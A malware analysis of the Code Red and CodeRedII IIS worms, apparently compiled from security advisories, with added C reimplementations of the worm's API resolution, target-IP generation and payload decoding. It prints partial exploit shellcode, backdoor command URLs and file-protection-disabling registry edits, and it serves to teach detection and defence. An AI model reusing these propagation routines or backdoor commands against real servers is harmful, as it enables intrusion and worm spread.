Code Red propagates through the .ida (Indexing Service ISAPI extension) buffer overflow in the IIS web server. Once a host is infected, the worm does the following on the affected machine:

1. Sets up the initial worm environment.
2. Creates 100 worm threads.
3. The first 99 threads spread the infection to other hosts.
4. The 100th thread checks whether the system is running an English (US) version of Windows. If it is, it replaces the host's web page with "Welcome to http://www.worm.com!, Hacked By Chinese!". This message disappears automatically after 10 hours, unless the host is infected again. If the system is not English, the 100th thread propagates to other hosts like the rest.
5. Each thread checks the local time. If the time is between 20:00 UTC and 23:59 UTC, the thread sends 100K bytes of data to www.whitehouse.gov; before 20:00 UTC it keeps propagating to other hosts.

The detailed analysis below was done with IDA (the Interactive Disassembler, from www.datarescue.com) and the MS VC debugging environment. I divide the worm into three parts for study: the core function module, the Hack web page module, and the attack www.whitehouse.gov module.

First, the core function module

1. Initial infection. When the target host (the host being infected) is hit, the following data is present in system memory:
4E 00 4E 00 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
92 90 58 68 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
FA 00 00 00 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 90 90
90 81 C3 00 03 00 00 8B
1B 53 FF 53 78
EIP is overwritten with 0x7801CBD3. The instruction at 0x7801CBD3 is a call ebx, so when EIP is rewritten to point there, control passes through EBX back into the attacker-supplied data carried in the HTTP request body. The bytes following the return address, 90 81 C3 00 03 00 00 8B 1B 53 FF 53 78, decode to nop / add ebx, 300h / mov ebx, [ebx] / push ebx / call dword ptr [ebx+78h], the stub from which the worm's own code continues.
2. Set up the initial stack variables
Coderef: seg000:000001d6 Worm
First, the worm builds a 218h-byte stack frame filled with CCh, then transfers control to the function-loading code.
All variables are referenced as EBP-X offsets.
3. Load functions (establish a jump table)
Coderef: seg000:00000203 DataSetup
First, the worm references the data section of the exploit code at EBP-198h. Then it needs to create its own internal function jump table.
The worm uses an RVA (Relative Virtual Address) lookup technique: in a nutshell, it walks a loaded module's export directory by RVA to find the address of GetProcAddress, then uses GetProcAddress to obtain LoadLibraryA. With these two functions it loads the following:
> From kernel32.dll:
GetSystemTime
CreateThread
CreateFileA
Sleep
GetSystemDefaultLangID
VirtualProtect
> From infocomm.dll:
TcpSockSend
> From ws2_32.dll:
socket
connect
send
recv
closesocket
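The RVA lookup technique described in step 3, reconstructed as an added example (this is not the worm's code and not from the original analysis). It walks a PE image's export directory by hand, the way position-independent shellcode resolves GetProcAddress before it has any imports; the worm does the same walk against a module already mapped into the IIS process (kernel32.dll exports both GetProcAddress and LoadLibraryA). To stay runnable without the Windows SDK or a real DLL, the PE structures are declared locally and the image is a constructed minimal PE with two exports; the RVAs 0x1000/0x2000, the name "fake.dll" and the whole layout are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal PE32 layout, declared by hand so this builds without windows.h.
 * Offsets follow the PE/COFF specification:
 *   e_lfanew (file offset of "PE\0\0")        at 0x3C
 *   IMAGE_FILE_HEADER (20 bytes)               at e_lfanew + 4
 *   IMAGE_OPTIONAL_HEADER32                    at e_lfanew + 24
 *   DataDirectory[0] = export table RVA/size   at optional header + 0x60 */
#define E_LFANEW_OFF   0x3C
#define EXPORT_DIR_OFF (4 + 20 + 0x60)       /* relative to e_lfanew */
#define IMG_SIZE       0x400

typedef struct {                             /* IMAGE_EXPORT_DIRECTORY, 40 bytes */
    uint32_t characteristics, time_date_stamp;
    uint16_t major_version, minor_version;
    uint32_t name_rva, ordinal_base, number_of_functions, number_of_names;
    uint32_t address_of_functions, address_of_names, address_of_name_ordinals;
} export_dir_t;

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static void     wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }

/* Resolve an export by name using nothing but RVA arithmetic from the module base,
 * which is how the worm reaches GetProcAddress before it has any imports at all.
 * Returns the export's RVA, or 0 if not found. Every RVA is bounds-checked against
 * `size` so a malformed image cannot drive reads past the buffer. */
uint32_t rva_lookup(const uint8_t *base, size_t size, const char *name)
{
    if (size < 0x40 || base[0] != 'M' || base[1] != 'Z') return 0;
    uint32_t pe = rd32(base + E_LFANEW_OFF);
    if ((size_t)pe + EXPORT_DIR_OFF + 4 > size || memcmp(base + pe, "PE\0\0", 4) != 0) return 0;

    uint32_t exp = rd32(base + pe + EXPORT_DIR_OFF);
    if (exp == 0 || (size_t)exp + sizeof(export_dir_t) > size) return 0;
    export_dir_t ed;
    memcpy(&ed, base + exp, sizeof ed);

    if ((size_t)ed.address_of_names + 4u * ed.number_of_names > size ||
        (size_t)ed.address_of_name_ordinals + 2u * ed.number_of_names > size ||
        (size_t)ed.address_of_functions + 4u * ed.number_of_functions > size) return 0;

    for (uint32_t i = 0; i < ed.number_of_names; i++) {
        uint32_t name_rva = rd32(base + ed.address_of_names + 4 * i);
        if (name_rva >= size) return 0;
        /* bounded compare: an unterminated name string cannot run off the image */
        if (strncmp((const char *)base + name_rva, name, size - name_rva) == 0) {
            uint16_t ord = rd16(base + ed.address_of_name_ordinals + 2 * i);
            if (ord >= ed.number_of_functions) return 0;
            return rd32(base + ed.address_of_functions + 4 * ord);   /* unbiased ordinal */
        }
    }
    return 0;
}

/* A constructed, minimal PE image with two named exports. The export names are the
 * two the worm needs; the RVAs 0x1000/0x2000 and the whole layout are invented. */
const uint8_t *fake_image(void)
{
    static uint8_t img[IMG_SIZE];
    static int built;
    if (built) return img;
    img[0] = 'M'; img[1] = 'Z';
    wr32(img + E_LFANEW_OFF, 0x40);
    memcpy(img + 0x40, "PE\0\0", 4);
    wr32(img + 0x40 + EXPORT_DIR_OFF, 0x200);                 /* export dir RVA  */
    wr32(img + 0x40 + EXPORT_DIR_OFF + 4, 0x100);             /* export dir size */

    export_dir_t ed = {0};
    ed.name_rva = 0x330;  ed.ordinal_base = 1;
    ed.number_of_functions = 2;  ed.number_of_names = 2;
    ed.address_of_functions = 0x300;
    ed.address_of_names = 0x310;
    ed.address_of_name_ordinals = 0x320;
    memcpy(img + 0x200, &ed, sizeof ed);

    wr32(img + 0x300, 0x1000);  wr32(img + 0x304, 0x2000);    /* function RVAs */
    wr32(img + 0x310, 0x340);   wr32(img + 0x314, 0x350);     /* name RVAs     */
    wr16(img + 0x320, 0);       wr16(img + 0x322, 1);         /* name ordinals */
    strcpy((char *)img + 0x330, "fake.dll");
    strcpy((char *)img + 0x340, "GetProcAddress");
    strcpy((char *)img + 0x350, "LoadLibraryA");
    built = 1;
    return img;
}

int main(void)
{
    const uint8_t *img = fake_image();
    printf("GetProcAddress -> RVA 0x%x\n", rva_lookup(img, IMG_SIZE, "GetProcAddress"));
    printf("LoadLibraryA   -> RVA 0x%x\n", rva_lookup(img, IMG_SIZE, "LoadLibraryA"));
    printf("CreateThread   -> RVA 0x%x (not exported by this image)\n",
           rva_lookup(img, IMG_SIZE, "CreateThread"));
    return 0;
}
```

The worm's version has no bounds checks, because it trusts the module it walks; the checks here are what a tool that parses untrusted PE files (a scanner, an unpacker) needs, since every field read is an attacker-controlled offset. Once GetProcAddress is found this way, the remaining names in the list above are resolved through it, which is why only that one export has to be located by hand.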
Finally, the worm stores the base address of W3SVC.DLL, which is used later to change the web page.

4. Check the threads that have been created
Coderef: seg000:00000512 func_load_done
It calls WriteClient (part of the ISAPI Extension API) to send "GET" back to the attacking machine. This appears to tell the attacker that the machine was infected successfully.
Then it counts its worm threads.
If the count equals 100, control passes to the Hack web page module.
If the count is less than 100, it creates a new thread. Each new thread is a straight copy of the worm.
5. Check for C:\notworm
This is a "lysine deficiency" feature, a kill switch that keeps the malicious code from propagating further.
If the file exists, the thread takes no further action; if it does not exist, it goes on to the next step.
6. Check the affected system's time
Coderef: seg000:00000803 NotWorm_no
Coderef: seg000:0000079d do_the_work
If the time is between 20:00 UTC and 23:59 UTC, the thread sends 100K bytes of data to www.whitehouse.gov.
If it is before 20:00 UTC, the thread continues spreading to other hosts.
7. Infect a new host
If it can open a connection to port 80 on the target IP, it sends a copy of itself there. If the send succeeds, it closes the socket and returns to step 5 to start a new loop.
Second, the Hack web page module
This module is called once 100 threads have been generated.
1. Check whether the system language is (US) English; if it is not, go back to step 5 of the core module.
Coderef: seg000:000005fe TOO_MANY_THREADS
2. Sleep for 2 hours
Coderef: seg000:00000636 IS_AMERICAN
This is presumably to let the worm propagate as far as possible before the page is changed.
3. Try to change the affected system's web page
Coderef: seg000:0000064f HACK_PAGE
Third, the attack www.whitehouse.gov module
Create a socket connection to port 80 of www.whitehouse.gov and send 100K bytes of data:
Coderef: seg000:000008ad Whitehouse_socket_setup
First, it creates a socket and connects to port 80 of 198.137.240.91 (www.whitehouse.gov / www1.whitehouse.gov).
Coderef: seg000:0000092f Whitehouse_socket_send
If the connection succeeds, it enters a loop that performs 18000h single-byte send() calls to the site.
Coderef: seg000:00000972 Whitehouse_sleep_loop
After the 18000h send() calls it sleeps for four and a half hours, then repeats the attack.
From: Marc Maiffret
via the NTBugtraq mailing list
Compiled by CNNS
Solution:
1. If the system has been infected, download and install the patch from Microsoft and restart the machine. Related information:
http://www.cnns.net/article/db/1720.htm
2. If you are not sure, run netstat -an at the MS-DOS prompt. A large number of connections to port 80 on arbitrary external IP addresses suggests the machine may be infected.
CodeRedII, like the original Code Red worm, will only exploit Windows 2000 web servers, because it overwrites EIP with the address of a jmp that is only correct under Windows 2000. Under NT 4.0 that offset is different, so the process will simply crash instead of allowing the worm to infect the system and spread.
This analysis is of the newly spreading CodeRedII.
To see more information about the previous version of Code Red, please see our previous advisory:
Continued Threat of the "Code Red" Worm
Details
This analysis is broken up into 3 sections: Infection, Propagation, Trojan
To check if your system has been infected, look for the existence of the files:
C:\explorer.exe
D:\explorer.exe
Also check your IIS scripts folder and msadc folder to see if the file root.exe exists. If it does, then you have been infected. Note: the older sadmind/IIS worm would also create root.exe from cmd.exe, so you could have a bit of crossover there.
To download this analysis and all disassembly files, go to:
http://www.eeye.com/html/advisories/coderedii.zip
Infection:
1st infection:
A. The first thing the worm does is set up a jump table so that it can get to all of its needed functions.
SEG000: 000001D0
B. The worm then proceeds to get its local IP address. This is later used to deal with subnet masks (propagation) and to make sure that the worm does not re-infect the local system.
SEG000: 000001D5
C. Next, the worm gets the local system language to see if the local system is running Chinese (Taiwanese) or Chinese (PRC).
SEG000: 000001F9
D. At this point the worm checks if it has executed before, and if so, proceeds to the propagation section (see the Propagation section).
SEG000: 0000021A
E. Next, the worm checks to see if a CodeRedII atom has been placed (GlobalFindAtomA). This allows the worm to make sure not to re-infect the local machine: if the atom already exists, it does not infect again.
SEG000: 00000240
F. The worm adds a CodeRedII atom. This is what lets the worm check whether a system has already been infected by it.
SEG000: 0000027D
G. The worm now sets its number of threads to 300 for non-Chinese systems. If the system is Chinese it sets it to 600.
SEG000: 00000286
H. At this point the worm spawns a thread starting back at step A. The worm will spawn threads according to the number set in G. Each new thread will be a propagation thread.
SEG000: 000002BA
I. This is where the worm calls the trojan functionality. You can find an analysis of the trojan mechanism below in the Trojan section.
SEG000: 000002C4
K. The worm sleeps 1 day if the local system is not Chinese, 2 days if it is.
SEG000: 000002DA
L. Reboot Windows.
SEG000: 000002E1
Propagation:
This is used to spread the worm further.
SEG000: 000002EB
A. Set up the local ip_storage variable. This is used by the propagation functionality and to make sure not to re-infect the local system.
SEG000: 000002EB
B. Sleep for 64h milliseconds.
SEG000: 000002F1
C. Get the local system time. The worm checks to see if the year is less than 2002 or if the month is less than 10. If the date is beyond either of those, then the worm reboots the local system. That limits the worm to 10/01 for its spreading (in a perfect world).
SEG000: 000002FD
D. Set up sockaddr_in. This calls the get_ip section.
SEG000: 0000031A
E. Set up socket. This performs a socket(), stores the handle, then makes it a non-blocking socket (this is important for speed when dealing with connect() calls).
SEG000: 00000337
F. Connect to the remote host. If it returns a connection right away, go to H.
SEG000: 00000357
The following is how the worm generates the IP address of the next host to connect to:

get_ip:                      ; CODE XREF: sub_1C4+168p
    call get_octet           ; load 4th octet (this is in reverse order due to byte order)
    mov  bh, al
    call get_octet           ; get 3rd octet
    mov  bl, al
    shl  ebx, 10h            ; shift bx to the top of ebx
    call get_octet           ; get 2nd octet
    mov  bh, al
    call get_octet           ; 1st
    mov  bl, al
    call gen_octet           ; get first octet
    and  eax, 7              ; and it by 7
    call check_addr_mask     ; ecx has eip

For each octet, generate a pseudo-random byte between 1 and 254. Next, get another random octet between 1 and 254 and AND it with 7; finally, use this last value to select the address mask, which decides how many of the leading octets come from the local address.
The most pertinent bit is check_addr_mask.
This specifies the following:
dd 0FFFFFFFFh   ; 0 - addr masks
dd 0FFFFFF00h   ; 1
dd 0FFFFFF00h   ; 2
dd 0FFFFFF00h   ; 3
dd 0FFFFFF00h   ; 4
dd 0FFFF0000h   ; 5
dd 0FFFF0000h   ; 6
dd 0FFFF0000h   ; 7
This mask is applied to the local system's IP address and combined with the generated IP address. This makes a new IP that shares 0, 1 or 2 bytes with the local IP.
For instance, 1/8th of the time the worm will generate a random IP not within any range of the local IP address.
1/2 of the time, it will stay within the same class A range as the local IP address.
3/8ths of the time, it will stay within the same class B range as the local IP address.
Also, note that if the IP the worm generates is 127.x.x.x, 224.x.x.x, or the same as the local system's IP address, the worm will skip that IP address and generate a new IP address to try to infect.
The way the worm generates IP addresses allows it to find possible IIS web servers quicker than the other Code Red worms that have previously been released. This new worm is also going to cause a lot more data to be zig-zagged across networks.
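The get_ip / check_addr_mask logic above, reimplemented in C as an added example (this is not the worm's code and not part of the original advisory). It reproduces the mask table and the skip rules from the text, then samples the generator to show the 1/8, 1/2, 3/8 split. Assumptions: the advisory does not describe the worm's PRNG, so a xorshift32 generator stands in for get_octet; the local address 192.168.5.17 and the seed are made up; addresses are kept in the little-endian register layout the listing implies, first octet in the low byte.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* check_addr_mask table from the listing above. Addresses are kept the way the worm
 * keeps them: the in_addr dword as it sits in a little-endian register, FIRST octet in
 * the LOW byte. So 0xFFFFFF00 keeps three random octets and takes the first octet from
 * the local address (same class A), and 0xFFFF0000 takes the first two (same class B). */
static const uint32_t addr_masks[8] = {
    0xFFFFFFFFu,                                        /* 0:   fully random    (1/8) */
    0xFFFFFF00u, 0xFFFFFF00u, 0xFFFFFF00u, 0xFFFFFF00u, /* 1-4: local class A   (4/8) */
    0xFFFF0000u, 0xFFFF0000u, 0xFFFF0000u,              /* 5-7: local class B   (3/8) */
};

uint32_t pack_ip(uint8_t o1, uint8_t o2, uint8_t o3, uint8_t o4)
{
    return (uint32_t)o1 | (uint32_t)o2 << 8 | (uint32_t)o3 << 16 | (uint32_t)o4 << 24;
}

static uint8_t octet(uint32_t ip, int n)   /* n = 1..4, dotted-quad position */
{
    return (uint8_t)(ip >> (8 * (n - 1)));
}

/* The advisory does not describe the worm's PRNG; xorshift32 stands in for get_octet
 * (assumption). The output range 1..254 is what the text states. */
typedef struct { uint32_t s; } prng_t;

static uint8_t get_octet(prng_t *p)
{
    uint32_t x = p->s;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    p->s = x;
    return (uint8_t)(1 + x % 254);
}

/* check_addr_mask: random bits where the mask is set, local bits everywhere else. */
uint32_t apply_mask(uint32_t random_ip, uint32_t local_ip, unsigned idx)
{
    uint32_t m = addr_masks[idx & 7];
    return (random_ip & m) | (local_ip & ~m);
}

/* Targets the worm discards: loopback, multicast, and the local host itself. */
bool skip_target(uint32_t ip, uint32_t local_ip)
{
    uint8_t first = octet(ip, 1);
    return first == 127 || first == 224 || ip == local_ip;
}

/* One pass of get_ip: four octets drawn 4th-first as in the listing, a fifth random
 * byte ANDed with 7 to pick the mask, then the skip check; on a skip, draw again. */
uint32_t next_target(prng_t *p, uint32_t local_ip)
{
    for (;;) {
        uint8_t o4 = get_octet(p), o3 = get_octet(p), o2 = get_octet(p), o1 = get_octet(p);
        unsigned idx = get_octet(p) & 7;
        uint32_t cand = apply_mask(pack_ip(o1, o2, o3, o4), local_ip, idx);
        if (!skip_target(cand, local_ip)) return cand;
    }
}

/* Draw n targets and count how many share the local /16, the local /8 only, or neither.
 * Over a few thousand draws this lands near the 3/8, 1/2, 1/8 split the text describes. */
typedef struct { unsigned same_b, same_a, other; } tally_t;

tally_t sample_targets(uint32_t local_ip, unsigned n, uint32_t seed)
{
    prng_t p = { seed ? seed : 1u };          /* xorshift must not start at zero */
    tally_t t = { 0, 0, 0 };
    for (unsigned i = 0; i < n; i++) {
        uint32_t ip = next_target(&p, local_ip);
        if (octet(ip, 1) == octet(local_ip, 1) && octet(ip, 2) == octet(local_ip, 2)) t.same_b++;
        else if (octet(ip, 1) == octet(local_ip, 1)) t.same_a++;
        else t.other++;
    }
    return t;
}

int main(void)
{
    uint32_t local = pack_ip(192, 168, 5, 17);   /* constructed local address */
    tally_t t = sample_targets(local, 8000, 0x1234u);
    printf("of 8000 targets: same /16 %u, same /8 only %u, elsewhere %u\n",
           t.same_b, t.same_a, t.other);
    return 0;
}
```

Compiled and run, this prints counts close to 3000 / 4000 / 1000 for 8000 draws. For defenders the mask table is the point: 7/8 of a CodeRedII host's probes land inside its own /8 or /16, so when hunting for it in flow logs, probe traffic from addresses in your own ranges is the expected case rather than an anomaly.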
G. Do a select() to get the handle. If no handle is returned, then go to K.
SEG000: 000003B6
H. Set the socket to blocking. This is so select() is not required after the connection.
SEG000: 000003C5
I. Send a copy of the worm.
SEG000: 000003E4
J. Do a recv(); this is not actually used anywhere.
SEG000: 000003FC
K. Close the socket and loop to A.
Trojan System:
This portion of the worm is designed to dump root.exe (root.exe is cmd.exe) into msadc and scripts, and to create a trojan on the local drive.
SEG000: 00000804
A. Get system directory. This gets the native system directory (i.e. c:\winnt\system32).
SEG000: 00000810
B. Append cmd.exe to the system directory string (c:\winnt\system32\cmd.exe).
SEG000: 00000828
C. Set drive modifier to C:
SEG000: 0000082D
D. Copy cmd.exe to \scripts\root.exe (actual path: drivemodifier:\inetpub\scripts\root.exe).
SEG000: 00000831
E. Copy cmd.exe to \msadc\root.exe (actual path: drivemodifier:\progra~1\common~1\system\msadc\root.exe).
SEG000: 00000863
F. Initialize area for explorer.exe.
SEG000: 000008A2
G. Create drive\explorer.exe (drive is C, then D).
SEG000: 00000E83
H. The worm now writes out explorer.exe. There is an embedded binary within the worm that is written out to explorer.exe. It has the property that if an embedded byte is 0xFC, it is replaced by 20h 0x00 bytes instead of the regular byte. For more on what the trojan explorer.exe binary does, see the Explorer.exe Trojan section. Also, the way NT works is that when a user logs into the local system it has to load explorer.exe (desktop, task bar, etc.). However, NT looks for explorer.exe first in the main drive path C:\, which means the trojan explorer.exe is going to be loaded the next time a user logs in. Therefore the system is trojaned over and over again.
SEG000: 00000EC8
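The 0xFC expansion described in step H, written out as an added decoder (example code, not the worm's and not from the advisory). It is what an analyst needs to carve the embedded explorer.exe out of a captured worm body. Assumptions: the sample blob below is constructed and is not the real embedded binary; the rule that one 0xFC stands for 20h zero bytes is taken from the text.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ZERO_RUN 0x20     /* one 0xFC escape byte stands for 20h zero bytes */

/* Output size the packed blob expands to: a quick sanity check before carving. */
size_t expanded_size(const uint8_t *in, size_t n)
{
    size_t out = 0;
    for (size_t i = 0; i < n; i++) out += (in[i] == 0xFC) ? ZERO_RUN : 1;
    return out;
}

/* Decode the worm's embedded-binary encoding: every byte is copied as-is except 0xFC,
 * which is replaced by ZERO_RUN 0x00 bytes. Returns the number of bytes written, or 0
 * when `cap` is too small (checked up front, so nothing is written in that case). */
size_t expand_embedded(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    if (expanded_size(in, n) > cap) return 0;
    size_t w = 0;
    for (size_t i = 0; i < n; i++) {
        if (in[i] == 0xFC) { memset(out + w, 0, ZERO_RUN); w += ZERO_RUN; }
        else out[w++] = in[i];
    }
    return w;
}

/* Constructed sample: an MZ-like prefix, two zero runs, and "PE" afterwards.
 * This is not the real embedded binary, just enough bytes to exercise the decoder. */
static const uint8_t sample_blob[] = { 0x4D, 0x5A, 0x90, 0x00, 0xFC, 0xFC, 0x50, 0x45 };
static uint8_t decoded[256];

size_t decode_sample(void)
{
    return expand_embedded(sample_blob, sizeof sample_blob, decoded, sizeof decoded);
}

const uint8_t *decoded_bytes(void) { return decoded; }

int main(void)
{
    size_t n = decode_sample();
    printf("%zu packed bytes -> %zu decoded bytes; decoded[68..69] = %02X %02X\n",
           sizeof sample_blob, n, decoded[68], decoded[69]);
    return 0;
}
```

Two things worth noticing: the scheme has no escape for a literal 0xFC byte, so it only round-trips for a binary that contains none, and the expanded size is known before any byte is written, which is what lets the decoder refuse an undersized buffer instead of truncating silently. Comparing expanded_size against the size of the explorer.exe recovered from an infected drive is a cheap check that the carve was complete.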
I. Close explorer.exe.
SEG000: 00000ED5
J. Change drive modifier to D; the worm goes back to the code in step D. After it is done it goes back to step K of the infection process.
SEG000: 00000EDD
Explorer.exe Trojan:
Explorer.exe quick overview:
1. Get the local system's Windows directory.
2. Execute explorer.exe from the local system's Windows directory.
3. The worm now goes into the following loop:
while (1)
{
    Set HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable to 0FFFFFF9Dh, which basically disables System File Protection.
    Set HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\Scripts to ,,217
    Set HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\Msadc to ,,217
    Set HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\C to C:\,,217
    Set HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\D to D:\,,217
    Sleep for 10 minutes
}
The above code creates virtual web paths (/c and /d) which map /c to C:\ and /d to D:\ (each Virtual Roots value is of the form path,username,access-flags, so 217 is the access mask). The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system, so even if you remove root.exe (the cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would look like: http://ipaddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or http://ipaddress/c/winnt/system32/cmd.exe?/c+dir, where dir could be any command an attacker wants to execute.
As long as the trojan explorer.exe is running, an attacker will be able to remotely access your server, because the loop re-creates the virtual roots and re-disables file protection every 10 minutes, undoing any manual cleanup.
Additional Information
This information has been provided by Ryan Permeh and Marc Maiffret of eEye Digital Security.